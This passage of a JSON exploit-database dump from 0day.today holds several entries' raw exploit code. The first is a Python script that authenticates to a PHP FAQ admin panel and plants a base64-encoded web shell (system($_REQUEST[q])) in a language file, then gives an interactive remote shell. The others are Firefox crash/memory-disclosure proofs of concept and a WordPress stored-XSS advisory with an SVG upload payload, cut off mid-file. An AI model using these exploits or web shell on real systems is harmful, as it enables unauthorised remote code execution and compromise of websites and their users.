help='user',required=True)\r\n args = parser.parse_args()\r\n \r\n url = args.url\r\n user = args.user\r\n password = args.password\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n\r\n#get the cookie\r\ndef login():\r\n global url, user, password,cookie\r\n print \"\\033[1;33m>>>>>> logging in\\033[1;m\"\r\n data = {\"faqusername\":user,\"faqpassword\":password}\r\n headers = {\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n if \"dashboard\" in r.text:\r\n print \"\\033[1;32m>>>>>> login sucessful\\033[1;m\"\r\n cookie = r.cookies[\"PHPSESSID\"]\r\n check()\r\n else:\r\n print \"login failed\"\r\n sys.exit()\r\n\r\n#check if user has access to edit translations. \r\n#get the crsf token \r\ndef check():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> check user auth\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n r = requests.get(url+\"/admin/index.php?action=transedit&translang=id\", headers=headers)\r\n if (\"You are not authorized.\" not in r.text) or (\"ajaxaction=save_translated_lang&csrf\" in r.text):\r\n print \"\\033[1;32m>>>>>> authorized\\033[1;m\"\r\n else:\r\n print \"not authorized\"\r\n sys.exit()\r\n #get csrf token\r\n str_csrf = r.text.split(\"action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\" )\r\n csrf = str_csrf[1][0:40]\r\n savebuffer()\r\n\r\n#save payload to session\r\ndef savebuffer():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> trying to fill the buffer\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\r\n \"LANG_CONF[main.metaDescription]\":'eval(base64_decode(\\\"c3lzdGVtKCRfUkVRVUVTVFtxXSk7IGlmKGlzc2V0KCRfUkVRVUVTVFttYXRpXSkpZGllOw==\\\"))'\r\n }\r\n r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_page_buffer&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text==\"1\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n write2file()\r\n else:\r\n sys.exit()\r\n \r\n#write payload to file\r\ndef write2file():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> write payload to server\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {}\r\n r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text!=\"\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n print \"\\033[1;32m>>>>>> enjoy your shell\\033[1;m\"\r\n exploit('')\r\n else:\r\n sys.exit()\r\n\r\n#send system command\r\ndef exploit(command):\r\n global url,cookie\r\n command = raw_input('\\033[1;31mshell > \\033[1;m') \r\n if command == \"exit\":\r\n print \"goodbye\"\r\n sys.exit()\r\n \r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\"q\":command,\r\n \"mati\":\"mati\",\r\n \"language\":\"id\"\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n print r.text\r\n exploit('')\r\n \r\nlogin()\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29018"}, {"lastseen": "2018-04-03T01:34:09", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "title": "Mozilla Firefox < 53 - ConvolvePixel Memory Disclosure Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T01:34:09", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5465"], "modified": "2017-05-25T00:00:00", "id": "1337DAY-ID-27839", "href": "https://0day.today/exploit/description/27839", "sourceData": "\r\n \r\n<svg filter=\"url(#f)\">\r\n<filter id=\"f\" filterRes=\"19\" filterUnits=\"userSpaceOnUse\">\r\n<feConvolveMatrix kernelMatrix=\"1 1 1 1 1 1 1 1 1\" kernelUnitLength=\"1 -1\" />\r\n \r\n\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27839"}, {"lastseen": "2018-02-20T03:24:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "title": "Mozilla Firefox < 53 - gfxTextRun Out-of-Bounds Read Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-20T03:24:07", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5447"], "modified": "2017-05-25T00:00:00", "id": "1337DAY-ID-27840", "href": "https://0day.today/exploit/description/27840", "sourceData": "\r\n \r\n<style>\r\n.class1 { float: left; white-space: pre-line; }\r\n.class2 { border-bottom-style: solid; font-face: Arial; font-size: 7ex; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n menuitem.appendChild(document.body.firstChild);\r\n canvas.toBlob(callback);\r\n}\r\nfunction callback() {\r\n var s = menu.style;\r\n s.setProperty(\"flex-direction\", \"row-reverse\");\r\n option.scrollBy();\r\n document.implementation.createHTMLDocument(\"foo\").adoptNode(progress);\r\n s.setProperty(\"flex-direction\", \"column\");\r\n canvas.toBlob(callback);\r\n}\r\n</script>\r\naaaaaaaaaaaaaaaaaa\r\n</head>\r\n<body onload=go()>\r\n<del class=\"class1\">\r\n<span class=\"class2\">\r\n<menu id=\"menu\">\r\n<menuitem>\r\n</menu>\r\n<menuitem id=\"menuitem\">\r\n<progress id=\"progress\">\r\n</del>\r\n<ol dir=\"rtl\">l+0</ol>\r\n<canvas id=\"canvas\">\r\n<option id=\"option\">\r\n \r\n\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27840"}, {"lastseen": "2018-02-15T21:19:38", "references": [], "description": "WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, allowing malicious .svg file uploads.", "edition": 1, "reporter": "Project Insecurity", "published": "2017-05-03T00:00:00", "title": "WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-15T21:19:38", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-03T00:00:00", "id": "1337DAY-ID-27710", "href": "https://0day.today/exploit/description/27710", "sourceData": "[+]---------------------------------------------------------[+]\r\n | Vulnerable Software: FancyProductDesigner(WP plugin) |\r\n | Vendor: http://fancyproductdesigner.com |\r\n | Vulnerability Type: Stored XSS + FPD / File upload |\r\n | Date Released: 29/04/2017 |\r\n | Released by: 5tarboy (@insecurity) |\r\n [+]---------------------------------------------------------[+]\r\n\r\nFancy Product Designer is a paid wordpress plugin ($50 fee) that allows users to upload custom products of their choice\r\nto the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG\r\nfiles also. There are estimated 40,000-50,000 vulnerable sites. \r\n\r\nIn order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload.\r\nHere is an example: https://www.saltsidecreations.com/product/ozark-20-oz/\r\nIt is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/\r\n\r\nHere is an example SVG file that can be uploaded (resulting in persistent/stored XSS):\r\n------------------------------------------------------------------------------------------------------------\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 20010904//EN\" \"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\">\r\n<svg version=\"1.0\" xmlns=\"http://www.w3.org/2000/svg\" width=\"300.000000pt\" height=\"300.000000pt\" viewBox=\"0 0 300.000000 300.000000\" preserveAspectRatio=\"xMidYMid meet\">\r\n <metadata>\r\n twitter: @insecurity\r\n </metadata>\r\n <g transform=\"translate(0.000000,300.000000) scale(0.100000,-0.100000)\"\r\n fill=\"#000000\" stroke=\"none\">\r\n <path d=\"M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z\"/>\r\n <path d=\"M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z\"/>\r\n <path d=\"M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z\"/>\r\n <path d=\"M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z\"/>\r\n <path d=\"M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z\"/>\r\n <path d=\"M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z\"/>\r\n <path d=\"M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z\"/>\r\n <path d=\"M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z\"/>\r\n <path d=\"M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z\"/>\r\n <path d=\"M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z\"/>\r\n <path d=\"M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z\"/>\r\n <path d=\"M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z\"/>\r\n <path d=\"M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z\"/>\r\n <path d=\"M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z\"/>\r\n <path d=\"M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z\"/>\r\n <path d=\"M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z\"/>\r\n <path d=\"M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z\"/>\r\n <path d=\"M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z\"/>\r\n <path d=\"M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z\"/>\r\n <path d=\"M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z\"/>\r\n <path d=\"M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z\"/>\r\n <path d=\"M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z\"/>\r\n <path d=\"M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z\"/>\r\n <path d=\"M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z\"/>\r\n <path d=\"M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z\"/>\r\n <path d=\"M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z\"/>\r\n <path d=\"M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z\"/>\r\n <path d=\"M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z\"/>\r\n <path d=\"M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z\"/>\r\n <path d=\"M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7\r\n -12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 